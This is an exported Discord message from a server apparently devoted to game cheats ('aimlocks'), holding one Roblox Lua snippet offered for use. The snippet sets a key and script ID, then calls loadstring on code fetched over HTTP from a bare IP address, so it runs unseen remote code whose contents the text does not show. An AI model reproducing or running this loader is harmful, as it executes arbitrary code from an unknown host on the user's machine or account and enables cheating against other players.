==============================================================
Guild: BIGGEST SETS,METH0DS,T00LS,AIMLOCKS VAULT
Channel: more locks / yun
==============================================================

[AM] deleted user#3213
```
getgenv().key = "QAUJcY3KMJ48t"
getgenv().scriptID = "qTpuBMsuwxGeRWwsimc4G"

loadstring(game:HttpGet(("http://135.125.132.19:8080/script/%s"):format(scriptID)))();
```

{Reactions}
🅱️ 🅰️ 🇳 

==============================================================
Exported 1 message(s)
==============================================================
